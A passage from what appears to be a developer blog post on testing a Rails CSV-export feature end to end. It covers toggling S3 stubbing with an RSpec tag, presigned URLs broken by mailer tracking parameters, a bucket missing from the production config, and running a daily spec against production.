        link_to_exported_zip = Nokogiri::HTML(mail_html_content).xpath("//a[text()='#{export_name}']").attribute("href").value
    
        csv_content = read_csv_in_zip_given_my_link link_to_exported_zip 
        expect(csv_content).not_to be_nil
        expect(csv_content).to include user.username
      end

    This spec does not work!

    First problem – AWS was stubbed

    We have a lot of other specs that are using the S3 API. It is a good practice, as you don’t want all your specs to touch S3 for real. It is slow and it is too coupled. But for this spec there was a problem. There was a file uploaded on S3, but the file was empty. The reason was that on one of the machines running the specs there was no ‘zip’ command. It was not installed, and we are using ‘zip’ to create a zip of the CSV files.

    Because of this I wanted to upload an actual file somehow and actually check what is in the file.

    I created a spec filter that would start a specific spec with real S3.

    # spec/rails_helper.rb
    RSpec.configure do |config|
      config.before(:each) do
        # Stub S3 for all specs
        Aws.config[:s3] = {
          stub_responses: true
        }
      end
    
      config.before(:each, s3_stub_responses: false) do
        # but for some specs, those that have "s3_stub_responses: false" tag do not stub s3 and call the real s3.
        Aws.config[:s3] = {
          stub_responses: false
        }
      end
    end

    This allows us to start the spec:

      scenario "create an export, uploads it on s3 and send an email", s3_stub_responses: false do
        # No in this spec S3 is not stubbed and we upload the file
      end

    Yes, we could create a local s3 server, but then the second problem comes.

    Mailer was adding invalid params

    In the email we are sending a presigned_url to the S3 file as the file is not public.
    But the mailer that we were using was adding “utm_campaign=…” to the url params.
    This means that the S3 presigned URL was not valid. Checking that there is a URL in the email was simply not enough. We had to actually download the file from S3 to make sure the link is correct.
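Why does an extra parameter break the link? An S3 presigned URL’s signature covers the exact query string, so anything appended afterwards makes the signature check fail. A sketch with a made-up bucket name and signature value:

```javascript
// Hypothetical presigned URL; the bucket and signature are made up.
const presigned = new URL(
  'https://the-bucket.s3.amazonaws.com/export.zip?X-Amz-Signature=abc123'
);

// What the mailer effectively did: append a tracking parameter.
presigned.searchParams.set('utm_campaign', 'export-email');

// The query string no longer matches what was signed, so S3 responds
// with SignatureDoesNotMatch instead of serving the file.
console.log(presigned.toString());
```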

    This was still not enough.

    It is still not working on production

    All the tests were passing with real S3 and real mailer in test and development env, but when I went on production the feature was not working.

    The problem was with the configuration. In order to upload to S3 we should know the bucket. The bucket was configured for test and development but was missing for production:

    config/environments/development.rb:  config.aws_bucket = 'the-bucket'
    config/environments/test.rb:  config.aws_bucket = 'the-bucket'
    config/environments/production.rb: # there was no config.aws_bucket

    The only way I could make sure that the configuration in production is correct and that the bucket is set up correctly is to run the spec on a real production.

    Should we run all specs on a real production?

    Of course not. But there should be a few specs for a few features that test that the buckets have the right permissions, that they are accessible, and that the configuration in production is right. This is what I’ve added. Once a day a spec goes to production and tests that everything works there with the real S3, real DB, real env and configuration, the same way that users will use the feature.

    How is this part of the CI/CD?

    It is not. We do not run this spec before deploy. We run all the other specs before deploy, which gives us 99% confidence that everything works. But for the one percent, we run a spec once every day (or after deploy) just to check a real, complex scenario involving the communication between different systems.

    It pays off.

     